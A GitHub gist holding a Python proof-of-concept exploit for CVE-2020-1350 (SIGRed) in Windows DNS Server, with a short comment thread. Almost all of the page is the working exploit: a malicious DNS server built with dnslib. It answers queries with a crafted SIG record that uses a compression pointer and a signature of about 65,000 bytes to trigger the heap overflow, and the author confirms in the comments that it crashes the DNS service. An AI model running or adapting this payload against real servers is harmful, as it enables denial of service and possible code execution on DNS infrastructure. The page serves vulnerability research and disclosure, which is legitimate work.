Skip to content

Instantly share code, notes, and snippets.

@joaovarelas
Created July 16, 2020 21:36
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save joaovarelas/6d88a078e033d6a36da2be664f62879f to your computer and use it in GitHub Desktop.
Save joaovarelas/6d88a078e033d6a36da2be664f62879f to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
"""cve-2020-1350.py: Windows DNS Server Vulnerability"""
__author__ = "@joaovarelas"
__date__ = "July, 2020"
import binascii,socket,struct
from dnslib import *
from dnslib.server import DNSServer,DNSHandler,BaseResolver,DNSLogger
class PassthroughDNSHandler(DNSHandler):
def get_reply(self,data):
host,port = self.server.resolver.address,self.server.resolver.port
request = DNSRecord.parse(data)
print("====================REQUEST====================")
print("Received via [{}]\n".format(self.protocol))
print(request)
rid = request.header.id
truncate = 1 if self.protocol == 'udp' else 0
authority = 0 if self.protocol == 'udp' else 1
header = DNSHeader(id=rid, qr=1, rd=1, ra=1, tc=truncate, auth=authority)
reply = DNSRecord(header=header, q=request.q)
# pointer
sig_name = b'\xc0\x0d'
# data = RDATA | RR(s).. [RDATA 32 bytes]
sig_tcp = b'\x00' * 32 + b'\xff' * (65428)
sig_udp = b'\x41' * 31 + b'\x00'
signature = sig_udp if self.protocol == 'udp' else sig_tcp
sig_len = len(signature)
print("=========================")
print("Signature Length: {}".format(sig_len))
# build SIG record
rrsig = RRSIG(covered=0, algorithm=0, labels=0, orig_ttl=0,
sig_exp=1893456000, sig_inc=1577836800,
key_tag=0, name=sig_name, sig=signature)
rr = RR(request.questions[0].qname, QTYPE.SIG, ttl=0, rdata=rrsig)
reply.add_answer(rr)
print("====================REPLY====================")
print("Sent via [{}]\n".format(self.protocol))
#print(reply)
# craft the buffer manually
buf = DNSBuffer()
header.pack(buf)
request.q.pack(buf)
#rr.pack(buf)
buf.encode_name(rr.rname)
buf.pack("!HHI",rr.rtype,rr.rclass,rr.ttl)
rdlength_ptr = buf.offset
buf.pack("!H",0)
start = buf.offset
if rr.rtype == QTYPE.OPT:
for opt in rr.rdata:
opt.pack(buf)
else:
#rr.rdata.pack(buf) #RRSIG.pack()
buf.pack("!HBBIIIH", rrsig.covered, rrsig.algorithm, rrsig.labels,
rrsig.orig_ttl, rrsig.sig_exp, rrsig.sig_inc, rrsig.key_tag)
#buf.encode_name_nocompress(SIGNAME)
buf.append(sig_name)
buf.append(b'\x00')
buf.append(signature)
end = buf.offset
buf.update(rdlength_ptr,"!H", end-start)
#return reply.pack()
return buf.data
def handle(self):
if self.server.socket_type == socket.SOCK_STREAM:
self.protocol = 'tcp'
data = self.request.recv(8192)
if len(data) < 2:
self.server.logger.log_error(self,"Request Truncated")
return
length = struct.unpack("!H",bytes(data[:2]))[0]
while len(data) - 2 < length:
new_data = self.request.recv(8192)
if not new_data:
break
data += new_data
data = data[2:]
else:
self.protocol = 'udp'
data,connection = self.request
self.server.logger.log_recv(self,data)
try:
rdata = self.get_reply(data)
self.server.logger.log_send(self,rdata)
if self.protocol == 'tcp':
rdatalen = len(rdata)
rdata = struct.pack("!H",rdatalen) + rdata
#rdata = struct.pack("!H", x) + rdata
self.request.sendall(rdata)
else:
connection.sendto(rdata,self.client_address)
except DNSError as e:
print("EXCEPTION HANDLER")
self.server.logger.log_error(self,e)
class ProxyResolver(BaseResolver):
def __init__(self,address,port,timeout=0):
self.address = address
self.port = port
self.timeout = timeout
def resolve(self,request,handler):
try:
if handler.protocol == 'udp':
proxy_r = request.send(self.address,self.port,
timeout=self.timeout)
else:
proxy_r = request.send(self.address,self.port,
tcp=True,timeout=self.timeout)
reply = DNSRecord.parse(proxy_r)
except socket.timeout:
reply = request.reply()
reply.header.rcode = getattr(RCODE,'NXDOMAIN')
return reply
def send_tcp(data,host,port):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((host,port))
sock.sendall(data)
response = sock.recv(8192)
length = struct.unpack("!H",bytes(response[:2]))[0]
while len(response) - 2 < length:
response += sock.recv(8192)
sock.close()
return response
def send_udp(data,host,port):
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.sendto(data,(host,port))
response,server = sock.recvfrom(8192)
sock.close()
return response
if __name__ == '__main__':
import argparse,sys,time
p = argparse.ArgumentParser(description="DNS Proxy")
p.add_argument("--port","-p",type=int,default=53,
metavar="<port>",
help="Local proxy port (default:53)")
p.add_argument("--address","-a",default="",
metavar="<address>",
help="Local proxy listen address (default:all)")
p.add_argument("--upstream","-u",default="8.8.8.8:53",
metavar="<dns server:port>",
help="Upstream DNS server:port (default:8.8.8.8:53)")
p.add_argument("--tcp",action='store_true',default=False,
help="TCP proxy (default: UDP only)")
p.add_argument("--timeout","-o",type=float,default=5,
metavar="<timeout>",
help="Upstream timeout (default: 5s)")
p.add_argument("--passthrough",action='store_true',default=False,
help="Dont decode/re-encode request/response (default: off)")
p.add_argument("--log",default="request,reply,truncated,error",
help="Log hooks to enable (default: +request,+reply,+truncated,+error,-recv,-send,-data)")
p.add_argument("--log-prefix",action='store_true',default=False,
help="Log prefix (timestamp/handler/resolver) (default: False)")
args = p.parse_args()
args.dns,_,args.dns_port = args.upstream.partition(':')
args.dns_port = int(args.dns_port or 53)
print("Starting Proxy Resolver (%s:%d -> %s:%d) [%s]" % (
args.address or "*",args.port,
args.dns,args.dns_port,
"UDP/TCP" if args.tcp else "UDP"))
resolver = ProxyResolver(args.dns,args.dns_port,args.timeout)
handler = PassthroughDNSHandler if args.passthrough else DNSHandler
logger = DNSLogger(args.log,args.log_prefix)
udp_server = DNSServer(resolver,
port=args.port,
address=args.address,
logger=logger,
handler=handler)
udp_server.start_thread()
if args.tcp:
tcp_server = DNSServer(resolver,
port=args.port,
address=args.address,
tcp=True,
logger=logger,
handler=handler)
tcp_server.start_thread()
while udp_server.isAlive():
time.sleep(1)
@joaovarelas
Copy link
Author

Does this exploit crashes the DNS server completely or just a thread?

@uzzzval I believe it crashes the DNS service completely. However, by default, it is restarted automatically after a while (also, as stated by CPResearch, which increases the exploitation realibility).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment